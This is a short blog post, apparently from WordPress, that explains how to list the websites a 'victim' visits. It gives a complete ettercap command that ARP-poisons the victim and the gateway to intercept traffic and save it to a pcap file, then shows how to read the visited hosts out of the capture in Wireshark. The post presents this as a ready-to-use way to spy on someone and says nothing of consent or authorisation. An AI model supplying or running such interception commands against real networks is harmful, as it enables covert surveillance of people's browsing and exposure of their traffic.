List victim’s visited websites


This is the easy and cheaper way:

you also need a Linux distro with Ettercap and Wireshark.

From command line type:

ettercap -T -Q -M arp:remote -i iface -w log.pcap /victimip/ /gatewayip/

What are you doing?

-T text only interface, only printf

-Q  Super quiet mode

-M arp:remote perform a MITM attack using ARP poisoning. “remote” is optional and you have to specify it if you want to sniff remote ip address poisoning a gateway. Indeed if you specify a victim and the gw in the TARGETS, ettercap will sniff only connection between them.

-i iface force using the “iface” network interface

-w log.pcap write sniffed data to “log.pcap” file

 

Open Wireshark and import the .pcap file, then go to:

Statistics -> HTTP -> Load Distribution

In the box type:

 http.host

Now look at the “HTTP Requests by HTTP Hosts“.

This will show you all the sniffed in/out  HTTP type traffic.

But take a look about Xplico

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s